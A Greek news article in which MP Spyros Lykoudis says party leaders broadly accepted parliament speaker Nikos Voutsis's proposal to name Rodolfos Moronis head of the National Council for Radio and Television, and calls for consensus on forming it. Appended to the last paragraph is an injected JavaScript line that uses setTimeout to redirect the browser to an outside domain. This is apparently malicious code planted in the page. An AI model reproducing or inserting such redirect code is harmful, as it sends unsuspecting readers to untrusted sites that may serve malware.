Λυκούδης: Ευμενώς αποδεκτή η πρόταση Βούτση για Ρ. Μορώνη επικεφαλής του ΕΣΡ

0
8

 

Στη διάσκεψη των προέδρων της Βουλής, πριν από 10 ημέρες, το σύνολο των πολιτικών δυνάμεων είχαν κάνει αποδεκτή σε γενικές γραμμές την εισήγηση του προέδρου του Ελληνικού Κοινοβουλίου Νίκου Βούτση, η οποία πρότεινε τον κ. Ροδόλφο Μορώνη επικεφαλής του ΕΣΡ, δήλωσε ο βουλευτής με «Το Ποτάμι» και αντιπρόεδρος της διάσκεψης, Σπύρος Λυκούδης.

«Τι σκέφτηκε, δηλαδή, ο ΣΥΡΙΖΑ μετά την ήττα του στο ΣτΕ; Έπρεπε να κάνει ρελάνς; Σκέφτηκε η κυβέρνηση ότι ο κ. Πολύδωρας μπορεί να είναι η βάση της συνεννόησης» διερωτήθηκε ο κ. Λυκούδης, μιλώντας στον ραδιοφωνικό σταθμό του Αθηναϊκού-Μακεδονικού Πρακτορείου Ειδήσεων και πρόσθεσε:

«Έχω βιώσει την τελευταία συνεδρίαση της διάσκεψης των προέδρων και ξέρω τι λέω, εκτός αν όλα τα πράγματα ανατρέπονται μέσα σε εικοσιτετράωρα. Το σύνολο των πολιτικών δυνάμεων δήλωσε στην τελευταία διάσκεψη των προέδρων -όλοι είπαμε- ότι ας κρατήσουμε 3-4 24ωρα ανοιχτό το ζήτημα, για να τελειώσει το ΣτΕ και αμέσως μετά, με συναίνεση, συγκροτούμε όλοι το ΕΣΡ, γιατί είναι συνταγματική μας υποχρέωση, προφανώς στη βάση μίας συναίνεσης».

«Η πρόταση που είχε έλθει, η γραπτή πρόταση επτά προσώπων από τον κ. Βούτση, τον πρόεδρο του Ελληνικού Κοινοβουλίου, ήταν πρόταση η οποία έγινε ευμενώς δεκτή. Βεβαίως, θα μπορούσε να συζητηθεί ο α’ ή ο β’, δεν κάναμε συζήτηση, αλλά ως πρόταση ως αντίληψη διαμόρφωσης του ΕΣΡ είχε γίνει δεκτή γενικά» πρόσθεσε.

Σε ό,τι αφορά τη σημερινή διάσκεψη για τη συγκρότηση του ΕΣΡ, ο κ. Λυκούδης επισήμανε: «Θα κάνουμε ό,τι μπορούμε για να υπάρξει συναίνεση και συνεννόηση, καθώς είναι συνταγματική μας υποχρέωση, όχι μόνο κυβερνητική, αλλά και της αντιπολίτευσης, να διαμορφώσουμε ΕΣΡ, να συγκροτήσουμε το Εθνικό Συμβούλιο Ραδιοτηλεόρασης». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here